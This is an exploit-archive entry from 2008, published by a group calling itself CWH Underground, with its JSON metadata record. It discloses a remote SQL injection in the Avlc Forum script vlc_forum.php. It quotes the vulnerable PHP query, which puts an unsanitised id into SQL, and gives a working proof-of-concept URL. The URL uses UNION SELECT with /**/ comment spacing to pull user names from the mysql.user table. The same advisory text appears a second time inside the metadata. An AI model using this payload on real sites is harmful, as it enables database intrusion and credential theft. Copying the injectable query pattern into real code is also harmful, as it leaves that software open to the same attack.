ID 1337DAY-ID-3394
Type zdt
Reporter CWH Underground
Modified 2008-07-12T00:00:00
Description
Exploit for unknown platform in category web applications
================================================================
Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
================================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 12 July 2008
#####################################################
APPLICATION : Avlc Forum
VERSION : N/A
VENDOR : N/A
#####################################################
-- Remote SQL Injection ---
---------------------------------
Vulnerable File [vlc_forum.php]
---------------------------------
@Line
141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());
-------------
POC Exploit
-------------
[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--
# 0day.today [2018-01-04] #
{"published": "2008-07-12T00:00:00", "id": "1337DAY-ID-3394", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-01-04T13:03:22", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-04T13:03:22", "rev": 2}, "vulnersScore": 0.6}, "type": "zdt", "lastseen": "2018-01-04T13:03:22", "edition": 2, "title": "Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/3394", "modified": "2008-07-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/3394", "references": [], "reporter": "CWH Underground", "sourceData": "================================================================\r\nAvlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability\r\n================================================================\r\n\r\n\r\n\r\n ,--^----------,--------,-----,-------^--,\r\n | ||||||||| `--------' | O\t.. CWH Underground Hacking Team ..\r\n `+---------------------------^----------|\r\n `\\_,-------, _________________________|\r\n / XXXXXX /`| /\r\n / XXXXXX / `\\ /\r\n / XXXXXX /\\______(\r\n / XXXXXX / \r\n / XXXXXX /\r\n (________( \r\n `------'\r\n\r\n\r\nAUTHOR : CWH Underground\r\nDATE : 12 July 2008\r\n\r\n\r\n#####################################################\r\n APPLICATION : Avlc Forum\r\n VERSION : N/A\r\n VENDOR\t : N/A\r\n#####################################################\r\n\r\n-- Remote SQL Injection ---\r\n\r\n---------------------------------\r\n Vulnerable File [vlc_forum.php]\r\n---------------------------------\r\n\r\n@Line\r\n\r\n 141: $sql = \"SELECT * FROM vlc_forum WHERE id=$id OR re=$id\";\r\n 142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());\r\n\r\n\r\n-------------\r\n POC Exploit\r\n-------------\r\n\r\n[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--\r\n\r\n\r\n\n# 0day.today [2018-01-04] #"}
{}